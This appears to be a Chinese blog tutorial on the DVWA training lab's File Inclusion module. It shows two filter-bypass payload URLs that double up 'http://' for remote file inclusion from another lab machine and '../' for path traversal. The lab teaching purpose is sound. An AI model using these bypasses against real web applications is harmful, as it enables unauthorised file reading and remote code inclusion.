DVWA靶场File Inclusion漏洞模块练习技巧

1.搭建好wamp环境,部署到宿主机或者虚拟机中,账号密码为admin和password,访问你的ip/dvwa-master。登陆成功之后在左下角设置安全等级,先设置medium,练习几个技巧。

2.在这里已经设置了安全等级为medium,但是点击某一个模块却还是别的等级,可以参考的另一篇文章,里面有详细的解决方法。 

https://blog.csdn.net/qq_51627054/article/details/144351673?spm=1001.2014.3001.5501

 3.点击File Inclusion,先参考代码。可知str_replace 函数将字符串中的 "http://" 和 "https://" 替换为空字符串,将字符串中的 "../" 和 "..\"" 替换为空字符串。这样我们可以利用双写。

 3.1 双写协议,两台虚拟机通过双写htthttp://p://,及时被删除了一个hppt://还剩下一个可以去解析

http://192.168.10.100:90/dvwa-master/vulnerabilities/fi/?page=htthttp://p://192.168.10.106:90/phpinfo.jpg

 3.2双写../绕过。即使..././ 会干掉一个../还剩../ 

http://192.168.10.100:90/dvwa-master/vulnerabilities/fi/?page=..././..././..././phpinfo.jpg

4.以上就是一些练习的小技巧,一些小思路,如果帮得到你,麻烦可以点个关注。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值